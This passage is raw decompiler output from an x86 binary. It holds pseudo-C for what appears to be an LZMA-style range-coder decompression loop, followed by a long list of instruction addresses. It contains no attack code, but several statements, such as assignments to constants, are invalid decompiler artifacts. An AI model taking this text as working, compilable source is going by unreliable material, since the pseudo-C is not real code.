												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                0x00000000
                                                0x00406473
                                                0x00406473
                                                0x00406477
                                                0x00406498
                                                0x0040649f
                                                0x004064a5
                                                0x004064ab
                                                0x004064bd
                                                0x004064c3
                                                0x004064c8
                                                0x00000000
                                                0x00406479
                                                0x0040647f
                                                0x00406840
                                                0x00406840
                                                0x00406840
                                                0x00406843
                                                0x00406843
                                                0x00406843
                                                0x00406849
                                                0x0040684f
                                                0x00406855
                                                0x0040686f
                                                0x00406872
                                                0x00406878
                                                0x00406883
                                                0x00406885
                                                0x00406857
                                                0x00406857
                                                0x00406866
                                                0x0040686a
                                                0x0040686a
                                                0x0040688f
                                                0x00000000
                                                0x00000000
                                                0x00406891
                                                0x00406895
                                                0x00406a44
                                                0x00406a5a
                                                0x00406a62
                                                0x00406a69
                                                0x00406a6b
                                                0x00406a72
                                                0x00406a76
                                                0x00406a76
                                                0x004068a1
                                                0x004068a8
                                                0x004068b0
                                                0x004068b3
                                                0x004068b6
                                                0x004068b6
                                                0x004068bc
                                                0x004068bc
                                                0x00406058
                                                0x00406058
                                                0x00406058
                                                0x00406061
                                                0x00000000
                                                0x00000000
                                                0x00406067
                                                0x00000000
                                                0x00406072
                                                0x00000000
                                                0x00000000
                                                0x0040607b
                                                0x0040607e
                                                0x00406081
                                                0x00406085
                                                0x00000000
                                                0x00000000
                                                0x0040608b
                                                0x0040608e
                                                0x00406090
                                                0x00406091
                                                0x00406094
                                                0x00406096
                                                0x00406097
                                                0x00406099
                                                0x0040609c
                                                0x004060a1
                                                0x004060a6
                                                0x004060af
                                                0x004060c2
                                                0x004060c5
                                                0x004060d1
                                                0x004060f9
                                                0x004060fb
                                                0x00406109
                                                0x00406109
                                                0x0040610d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004060fd
                                                0x004060fd
                                                0x00406100
                                                0x00406101
                                                0x00406101
                                                0x00000000
                                                0x004060fd
                                                0x004060d7
                                                0x004060dc
                                                0x004060dc
                                                0x004060e5
                                                0x004060ed
                                                0x004060f0
                                                0x00000000
                                                0x004060f6
                                                0x004060f6
                                                0x00000000
                                                0x004060f6
                                                0x00000000
                                                0x00406113
                                                0x00406113
                                                0x00406117
                                                0x004069c3
                                                0x00000000
                                                0x004069c3
                                                0x00406120
                                                0x00406130
                                                0x00406133
                                                0x00406136
                                                0x00406136
                                                0x00406136
                                                0x00406139
                                                0x0040613d
                                                0x00000000
                                                0x00000000
                                                0x0040613f
                                                0x00406145
                                                0x0040616f
                                                0x00406175
                                                0x0040617c
                                                0x00000000
                                                0x0040617c
                                                0x0040614b
                                                0x0040614e
                                                0x00406153
                                                0x00406153
                                                0x0040615e
                                                0x00406166
                                                0x00406169
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004061ae
                                                0x004061b4
                                                0x004061b7
                                                0x004061c4
                                                0x004061cc
                                                0x00000000
                                                0x00000000
                                                0x00406183
                                                0x00406183
                                                0x00406187
                                                0x004069d2
                                                0x00000000
                                                0x004069d2
                                                0x00406193
                                                0x0040619e
                                                0x0040619e
                                                0x0040619e
                                                0x004061a1
                                                0x004061a4
                                                0x004061a7
                                                0x004061ac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406843
                                                0x00406843
                                                0x00406849
                                                0x0040684f
                                                0x00406855
                                                0x0040686f
                                                0x00406872
                                                0x00406878
                                                0x00406883
                                                0x00406885
                                                0x00406857
                                                0x00406857
                                                0x00406866
                                                0x0040686a
                                                0x0040686a
                                                0x0040688f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004061d4
                                                0x004061d6
                                                0x004061d9
                                                0x0040624a
                                                0x0040624d
                                                0x00406250
                                                0x00406257
                                                0x00406261
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x004061db
                                                0x004061df
                                                0x004061e2
                                                0x004061e4
                                                0x004061e7
                                                0x004061ea
                                                0x004061ec
                                                0x004061ef
                                                0x004061f1
                                                0x004061f6
                                                0x004061f9
                                                0x004061fc
                                                0x00406200
                                                0x00406207
                                                0x0040620a
                                                0x00406211
                                                0x00406215
                                                0x0040621d
                                                0x0040621d
                                                0x0040621d
                                                0x00406217
                                                0x00406217
                                                0x00406217
                                                0x0040620c
                                                0x0040620c
                                                0x0040620c
                                                0x00406221
                                                0x00406224
                                                0x00406242
                                                0x00406244
                                                0x00000000
                                                0x00406226
                                                0x00406226
                                                0x00406229
                                                0x0040622c
                                                0x0040622f
                                                0x00406231
                                                0x00406231
                                                0x00406231
                                                0x00406234
                                                0x00406237
                                                0x00406239
                                                0x0040623a
                                                0x0040623d
                                                0x00000000
                                                0x0040623d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004064dd
                                                0x004064e1
                                                0x00406504
                                                0x00406507
                                                0x0040650a
                                                0x00406514
                                                0x004064e3
                                                0x004064e3
                                                0x004064e6
                                                0x004064e9
                                                0x004064ec
                                                0x004064f9
                                                0x004064fc
                                                0x004064fc
                                                0x00406840
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00000000
                                                0x00406520
                                                0x00406524
                                                0x00000000
                                                0x00000000
                                                0x0040652a
                                                0x0040652e
                                                0x00000000
                                                0x00000000
                                                0x00406534
                                                0x00406536
                                                0x0040653a
                                                0x0040653a
                                                0x0040653d
                                                0x00406541
                                                0x00000000
                                                0x00000000
                                                0x00406591
                                                0x00406595
                                                0x0040659c
                                                0x0040659f
                                                0x004065a2
                                                0x004065ac
                                                0x00406840
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00406840
                                                0x00406597
                                                0x00000000
                                                0x00000000
                                                0x004065b8
                                                0x004065bc
                                                0x004065c3
                                                0x004065c6
                                                0x004065c9
                                                0x004065be
                                                0x004065be
                                                0x004065be
                                                0x004065cc
                                                0x004065cf
                                                0x004065d2
                                                0x004065d2
                                                0x004065d5
                                                0x004065d8
                                                0x004065db
                                                0x004065db
                                                0x004065de
                                                0x004065e5
                                                0x004065ea
                                                0x00000000
                                                0x00000000
                                                0x00406678
                                                0x00406678
                                                0x0040667c
                                                0x00406a1a
                                                0x00000000
                                                0x00406a1a
                                                0x00406682
                                                0x00406685
                                                0x00406688
                                                0x0040668c
                                                0x0040668f
                                                0x00406695
                                                0x00406697
                                                0x00406697
                                                0x00406697
                                                0x0040669a
                                                0x0040669d
                                                0x00000000
                                                0x00000000
                                                0x0040626d
                                                0x0040626d
                                                0x00406271
                                                0x004069de
                                                0x00000000
                                                0x004069de
                                                0x00406277
                                                0x0040627a
                                                0x0040627d
                                                0x00406281
                                                0x00406284
                                                0x0040628a
                                                0x0040628c
                                                0x0040628c
                                                0x0040628c
                                                0x0040628f
                                                0x00406292
                                                0x00406292
                                                0x00406295
                                                0x00406298
                                                0x00000000
                                                0x00000000
                                                0x0040629e
                                                0x004062a4
                                                0x00000000
                                                0x00000000
                                                0x004062aa
                                                0x004062aa
                                                0x004062ae
                                                0x004062b1
                                                0x004062b4
                                                0x004062b7
                                                0x004062ba
                                                0x004062bb
                                                0x004062be
                                                0x004062c0
                                                0x004062c6
                                                0x004062c9
                                                0x004062cc
                                                0x004062cf
                                                0x004062d2
                                                0x004062d5
                                                0x004062d8
                                                0x004062f4
                                                0x004062f7
                                                0x004062fa
                                                0x004062fd
                                                0x00406304
                                                0x00406308
                                                0x0040630a
                                                0x0040630e
                                                0x004062da
                                                0x004062da
                                                0x004062de
                                                0x004062e6
                                                0x004062eb
                                                0x004062ed
                                                0x004062ef
                                                0x004062ef
                                                0x00406311
                                                0x00406318
                                                0x0040631b
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406326
                                                0x00406326
                                                0x0040632a
                                                0x004069ea
                                                0x00000000
                                                0x004069ea
                                                0x00406330
                                                0x00406333
                                                0x00406336
                                                0x0040633a
                                                0x0040633d
                                                0x00406343
                                                0x00406345
                                                0x00406345
                                                0x00406345
                                                0x00406348
                                                0x0040634b
                                                0x0040634b
                                                0x0040634b
                                                0x00406351
                                                0x00000000
                                                0x00000000
                                                0x00406353
                                                0x00406356
                                                0x00406359
                                                0x0040635c
                                                0x0040635f
                                                0x00406362
                                                0x00406365
                                                0x00406368
                                                0x0040636b
                                                0x0040636e
                                                0x00406371
                                                0x00406389
                                                0x0040638c
                                                0x0040638f
                                                0x00406392
                                                0x00406392
                                                0x00406395
                                                0x00406399
                                                0x0040639b
                                                0x00406373
                                                0x00406373
                                                0x0040637b
                                                0x00406380
                                                0x00406382
                                                0x00406384
                                                0x00406384
                                                0x0040639e
                                                0x004063a5
                                                0x004063a8
                                                0x00000000
                                                0x004063aa
                                                0x00000000
                                                0x004063aa
                                                0x004063a8
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x00000000
                                                0x00000000
                                                0x004063ea
                                                0x004063ea
                                                0x004063ee
                                                0x004069f6
                                                0x00000000
                                                0x004069f6
                                                0x004063f4
                                                0x004063f7
                                                0x004063fa
                                                0x004063fe
                                                0x00406401
                                                0x00406407
                                                0x00406409
                                                0x00406409
                                                0x00406409
                                                0x0040640c
                                                0x0040640f
                                                0x0040640f
                                                0x00406415
                                                0x004063b3
                                                0x004063b3
                                                0x004063b6
                                                0x00000000
                                                0x004063b6
                                                0x00406417
                                                0x00406417
                                                0x0040641a
                                                0x0040641d
                                                0x00406420
                                                0x00406423
                                                0x00406426
                                                0x00406429
                                                0x0040642c
                                                0x0040642f
                                                0x00406432
                                                0x00406435
                                                0x0040644d
                                                0x00406450
                                                0x00406453
                                                0x00406456
                                                0x00406456
                                                0x00406459
                                                0x0040645d
                                                0x0040645f
                                                0x00406437
                                                0x00406437
                                                0x0040643f
                                                0x00406444
                                                0x00406446
                                                0x00406448
                                                0x00406448
                                                0x00406462
                                                0x00406469
                                                0x0040646c
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x004066fb
                                                0x004066fb
                                                0x004066ff
                                                0x00406a26
                                                0x00000000
                                                0x00406a26
                                                0x00406705
                                                0x00406708
                                                0x0040670b
                                                0x0040670f
                                                0x00406712
                                                0x00406718
                                                0x0040671a
                                                0x0040671a
                                                0x0040671a
                                                0x0040671d
                                                0x00000000
                                                0x00000000
                                                0x004064cb
                                                0x004064cb
                                                0x004064ce
                                                0x00406840
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00000000
                                                0x0040680a
                                                0x0040680e
                                                0x00406830
                                                0x00406833
                                                0x0040683d
                                                0x00406840
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00406840
                                                0x00406810
                                                0x00406813
                                                0x00406817
                                                0x0040681a
                                                0x0040681a
                                                0x0040681d
                                                0x00000000
                                                0x00000000
                                                0x004068c7
                                                0x004068cb
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068f0
                                                0x004068f7
                                                0x004068fe
                                                0x004068fe
                                                0x00000000
                                                0x004068fe
                                                0x004068cd
                                                0x004068d0
                                                0x004068d3
                                                0x004068d6
                                                0x004068dd
                                                0x00406821
                                                0x00406821
                                                0x00406824
                                                0x00000000
                                                0x00000000
                                                0x004069b8
                                                0x004069bb
                                                0x004068bc
                                                0x00000000
                                                0x00000000
                                                0x004065f2
                                                0x004065f4
                                                0x004065fb
                                                0x004065fc
                                                0x004065fe
                                                0x00406601
                                                0x00000000
                                                0x00000000
                                                0x00406609
                                                0x0040660c
                                                0x0040660f
                                                0x00406611
                                                0x00406613
                                                0x00406613
                                                0x00406614
                                                0x00406617
                                                0x0040661e
                                                0x00406621
                                                0x0040662f
                                                0x00000000
                                                0x00000000
                                                0x00406905
                                                0x00406905
                                                0x00406908
                                                0x0040690f
                                                0x00000000
                                                0x00000000
                                                0x00406914
                                                0x00406914
                                                0x00406918
                                                0x00406a50
                                                0x00000000
                                                0x00406a50
                                                0x0040691e
                                                0x00406921
                                                0x00406924
                                                0x00406928
                                                0x0040692b
                                                0x00406931
                                                0x00406933
                                                0x00406933
                                                0x00406933
                                                0x00406936
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x0040693c
                                                0x0040693c
                                                0x00406940
                                                0x004069a0
                                                0x004069a3
                                                0x004069a8
                                                0x004069a9
                                                0x004069ab
                                                0x004069ad
                                                0x004069b0
                                                0x004068bc
                                                0x004068bc
                                                0x00000000
                                                0x004068c2
                                                0x004068bc
                                                0x00406942
                                                0x00406948
                                                0x0040694b
                                                0x0040694e
                                                0x00406951
                                                0x00406954
                                                0x00406957
                                                0x0040695a
                                                0x0040695d
                                                0x00406960
                                                0x00406963
                                                0x0040697c
                                                0x0040697f
                                                0x00406982
                                                0x00406985
                                                0x00406989
                                                0x0040698b
                                                0x0040698b
                                                0x0040698c
                                                0x0040698f
                                                0x00406965
                                                0x00406965
                                                0x0040696d
                                                0x00406972
                                                0x00406974
                                                0x00406977
                                                0x00406977
                                                0x00406992
                                                0x00406999
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x00406637
                                                0x0040663a
                                                0x00406670
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a3
                                                0x004067a3
                                                0x004067a6
                                                0x004067a8
                                                0x00406a32
                                                0x00000000
                                                0x00406a32
                                                0x004067ae
                                                0x004067b1
                                                0x00000000
                                                0x00000000
                                                0x004067b7
                                                0x004067bb
                                                0x004067be
                                                0x004067be
                                                0x004067be
                                                0x00000000
                                                0x004067be
                                                0x0040663c
                                                0x0040663e
                                                0x00406640
                                                0x00406642
                                                0x00406645
                                                0x00406646
                                                0x00406648
                                                0x0040664a
                                                0x0040664d
                                                0x00406650
                                                0x00406666
                                                0x0040666b
                                                0x004066a3
                                                0x004066a3
                                                0x004066a7
                                                0x004066d3
                                                0x004066d5
                                                0x004066dc
                                                0x004066df
                                                0x004066e2
                                                0x004066e2
                                                0x004066e7
                                                0x004066e7
                                                0x004066e9
                                                0x004066ec
                                                0x004066f3
                                                0x004066f6
                                                0x00406723
                                                0x00406723
                                                0x00406726
                                                0x00406729
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x00000000
                                                0x0040679d
                                                0x0040672b
                                                0x00406731
                                                0x00406734
                                                0x00406737
                                                0x0040673a
                                                0x0040673d
                                                0x00406740
                                                0x00406743
                                                0x00406746
                                                0x00406749
                                                0x0040674c
                                                0x00406765
                                                0x00406767
                                                0x0040676a
                                                0x0040676b
                                                0x0040676e
                                                0x00406770
                                                0x00406773
                                                0x00406775
                                                0x00406777
                                                0x0040677a
                                                0x0040677c
                                                0x0040677f
                                                0x00406783
                                                0x00406785
                                                0x00406785
                                                0x00406786
                                                0x00406789
                                                0x0040678c
                                                0x0040674e
                                                0x0040674e
                                                0x00406756
                                                0x0040675b
                                                0x0040675d
                                                0x00406760
                                                0x00406760
                                                0x0040678f
                                                0x00406796
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00000000
                                                0x00406798
                                                0x00000000
                                                0x00406798
                                                0x00406796
                                                0x004066a9
                                                0x004066ac
                                                0x004066ae
                                                0x004066b1
                                                0x004066b4
                                                0x004066b7
                                                0x004066b9
                                                0x004066bc
                                                0x004066bf
                                                0x004066bf
                                                0x004066c2
                                                0x004066c2
                                                0x004066c5
                                                0x004066cc
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x00000000
                                                0x004066ce
                                                0x00000000
                                                0x004066ce
                                                0x004066cc
                                                0x00406652
                                                0x00406655
                                                0x00406657
                                                0x0040665a
                                                0x00000000
                                                0x00000000
                                                0x004063b9
                                                0x004063b9
                                                0x004063bd
                                                0x00406a02
                                                0x00000000
                                                0x00406a02
                                                0x004063c3
                                                0x004063c6
                                                0x004063c9
                                                0x004063cc
                                                0x004063cf
                                                0x004063d2
                                                0x004063d5
                                                0x004063d7
